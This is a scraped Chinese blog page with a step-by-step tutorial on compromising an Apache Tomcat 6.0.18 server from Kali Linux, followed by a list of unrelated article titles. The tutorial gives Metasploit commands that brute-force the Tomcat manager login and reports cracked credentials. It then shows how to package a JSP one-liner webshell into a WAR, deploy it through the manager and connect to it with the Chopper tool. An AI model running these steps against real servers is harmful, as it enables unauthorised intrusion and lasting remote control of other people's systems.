Pentest for kali-linux-Tomcat
来源:互联网 发布:python 中国地图 编辑:程序博客网 时间:2024/06/09 03:51
A-1 信息收集
1.通过报错或者title判断目标的cms类型或是服务框架
u框架:Apache Tomcat
版本:6.0.18
2.亦或者通过kali下的nmap来识别
3.探测tomcat的管理后台
默认tomcat的管理后台在http://target/manager/html下或者点击tomcat测试页的Administration--
Tomcat Manager即可。
可以看到tomcat进行了身份验证,进入tomcat管理后台口令的方法不止一种,首先我们可以通过暴力破解的方式来测试一下目标是否是弱口令,如果不是我们再用其他办法,比如是否可以利用已知漏洞绕过登录限制。
A-2利用metasploit进行暴力破解
说到这里我们在kali下有两款工具可以完成暴力破解的任务分别是burpsuite和metasploit.
但是这里就不多说burpsuite了,有兴趣的可以自行百度一下如何用burpsuite来进行暴力破解的。
在metasploit的辅助模块里已经集成了一个暴力破解tomcat后台的脚本tomcat_mgr_login.rb
启动metasploit
root@Leeboble:~# service postgresql start
root@Leeboble:~# service metasploit start
root@Leeboble:~# msfconsole
加载辅助模块
msf > search tomcat_mgr
msf > use auxiliary/scanner/http/tomcat_mgr_login
msf auxiliary(tomcat_mgr_login) >
配置模块
msf auxiliary(tomcat_mgr_login) > show options
用show options命令查看配置参数,由于该模块已经配置了用来暴力破解的user和password的字典因此不用再去配置了(如果有需要的话,可以向/usr/share/metasploit-framework/data/wordlists中的添加字段或者另外加载一份亦可)。接下来只需要配置远程主机IP、远程主机端口
msf auxiliary(tomcat_mgr_login) > set RHOSTS xxx.xxx.xxx.xx
msf auxiliary(tomcat_mgr_login) > set RPORT 80
msf auxiliary(tomcat_mgr_login) > run
可见爆破成功,获取到tomcat的登录口令:xmapp:xmapp
A-3 通过tomcat管理后台getshell
1.制作war包
root@Leeboble:~/Desktop# mkdir testweb
root@Leeboble:~/Desktop# vim index.jsp 【这里写入jsp一句话】
root@Leeboble:~/Desktop# cp index.jsp testweb/
root@Leeboble:~/Desktop# cd testweb/
root@Leeboble:~/Desktop/testweb# jar -cvf ../testweb.war *
2.Getshell
上传部署war包
看如下图,已经成功部署了war包
访问webshell的地址
http://target/testweb/index.jsp出现500的错误
这是正常现象,直接把链接用菜刀连接即可
离线版文章:Pentest for kali-linux-Tomcat
- Pentest for kali-linux-Tomcat
- kali-linux-wireless-pentest-zh
- Kali Linux下安装JDBC和tomcat
- tomcat install for linux
- tomcat for linux 安装
- kali linux
- Kali Linux
- kali linux
- Kali Linux
- Kali Linux
- Kali linux
- kali linux
- Kali linux
- kali linux
- kali下tomcat安装出错
- [Android]Kali for Galaxy S4
- Linux 下修改默认openJDK为Oracle JDK搭建Apache-Tomcat (Kali)
- 开始体验Kali Linux
- Reverse Integer
- Windows Phone 学习 直接在程序中发电子邮件
- Swift学习:5.断言
- DBA需要掌握的shell知识
- 继承已有对象创建新对象
- Pentest for kali-linux-Tomcat
- Java中的 WeakReference 和 SoftReference
- Single Number
- android访问php webservice简单一例
- 在linux Mint下架设流媒体服务器的经验
- JS之clientX,clientY,screenX,screenY,offsetX,offsetY区别测试
- 携手时间,靠近梦想——番茄工作法使用分享
- SDWebImage
- 数据流重定向